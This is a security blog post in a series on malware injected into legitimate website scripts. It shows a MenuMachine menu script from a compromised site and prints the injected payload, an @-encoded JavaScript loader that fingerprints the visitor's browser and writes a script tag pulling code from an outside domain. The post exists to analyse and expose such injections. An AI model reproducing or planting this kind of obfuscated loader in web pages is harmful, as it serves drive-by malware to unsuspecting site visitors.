• When Benign scripts attack – IV

    We have received significant requests to keep up with this series of posts which try to capture the evolution of how hackers are injecting benign scripts with malware in the hopes of hiding their malicious content amongst good code.

    This particular example shows how a menumachine script was used by a hacker to spread malicious code. This example is a little bit different from the ones we have posted before as it does not just post the malicious code using a straight iframe or obviously understandable JavaScript. This example shows how hackers are trying just a little bit harder to inject code that is somewhat obfuscated. This code was mined from www.rvp1875.com/index.html. Take a look at the example below.

    /* menumachine.js v1.7.1.1 - a component of MenuMachine (c)2004 Big Bang Software Pty Ltd :: menumachine.com*/
    
    _ud="undefined";
    
    if(typeof(bbMenu)==_ud)
      bbMenu=new Array();
    
    bb_fix=new Array();
    
    function _bbroot(bbL,name,r2L,clkOp,hRelPos,vRelPos,hRPmargin,vRPmargin,smScr,scrSp,scrAm,tri,triDn,triL,t_Hr,s_Hr,fade,posID,s_bCol,s_bW,s_bBtw,s_fFam,s_fSz,s_fWt,s_fStl,s_txAl,s_lPad,s_tPad,hOL,vOL,sArr,bCol,bw,bBtw,fFam,fSz,fWt,fStl,txAl,lPad,tPad,top_vOL,top_hOL,tArr,spc,nhlP,bUp,s_ao,ao)
    {
      if(typeof(__pg)==_ud)
      {
        _b=new __bbBrChk();
        _hr=null;
    
        if(_b.ieDom&&!_b.mac){
          var els=document.getElementsByTagName("base");
    
          if(els.length){
            _hr=els[0].getAttribute("href");
          }
        }
    
        if(!_hr)
          _hr="";
    
        __pg=new _bbPg();
    
    **code removed for brevity**
    
        for(var g=0;g<bbMenu.length;g++)
          bbMenu[g].off();
      }
    
      __bbMmB=1;
      _bbUld(); 
    }
    
    function _bbPg()
    {
      var t=this;
      t.wn=window;
      t.d=t.wn.document;
      t.w=(_b.dt&&_b.ie)?t.d.documentElement.clientWidth:_b.ie||_b.nsDom?t.d.body.clientWidth:t.wn.innerWidth;
      t.h=(_b.dt&&_b.ie)?t.d.documentElement.clientHeight:_b.ie||_b.nsDom?t.d.body.clientHeight:t.wn.innerHeight;
      t.wn.onresize=_b.n4?_bbRzevt:_bbRePo;
    }
    
    **malicious code**
    
    <!--
    (function(hVAxp){var v120='va@72@20a@3d@22@53@63ript@45ngine@22@2c@62@
    3d@22Ve@72@73i@6fn@28)+@22@2c@6a@3d@22@22@2cu@3d@6eavig@61tor@2euse@72A
    ge@6et@3b@69@66((@75@2e@69n@64exOf(@22Chrome@22)@3c0)@26@26(u@2ei@6edexO
    @66@28@22@57in@22@29@3e0)@26@26@28@75@2e@69@6edexO@66(@22NT@20@36@22)@3c
    0)@26@26(@64o@63u@6dent@2ecoo@6b@69e@2eind@65@78Of(@22mi@65k@3d1@22)@3c@
    30)@26@26(ty@70eof(@7arv@7at@73)@21@3dt@79@70e@6ff(@22A@22@29))@7bzrvzts
    @3d@22@41@22@3beval(@22if@28wi@6ed@6fw@2e@22+a@2b@22)j@3dj+@22+@61+@22M@
    61jor@22@2bb+a+@22Mi@6eor@22@2bb@2ba@2b@22Bu@69@6c@64@22+@62@2b@22j@3b@2
    2)@3b@64ocume@6et@2ewrit@65(@22@3cscri@70t@20src@3d@2f@2fm@61rt@22@2b@22
    @75@7a@2ec@6e@2fvid@2f@3fi@64@3d@22+j+@22@3e@3c@5c@2fs@63@72i@70t@3e@22)
    @3b@7d';var Id4=v120.re lace(h Axp,'%');var gIl=unes cape(Id4);eval(gIl)}
    )(/\@/g);
    -->
    

    Till next time..

    • […] Quite recently we blogged about how hackers are using benign and useful JavaScript hosted locally on accounts managed by the website owner/admin to spread malware. Hackers have injected malicious code right into useful snippets of JavaScript which do everything from displaying menu buttons, drop down choices and much much more. Take a look at our previous findings: here. […]

      Posted by Hackers understand the value of backups – stopthehacker.com – Jaal, LLC on May 9th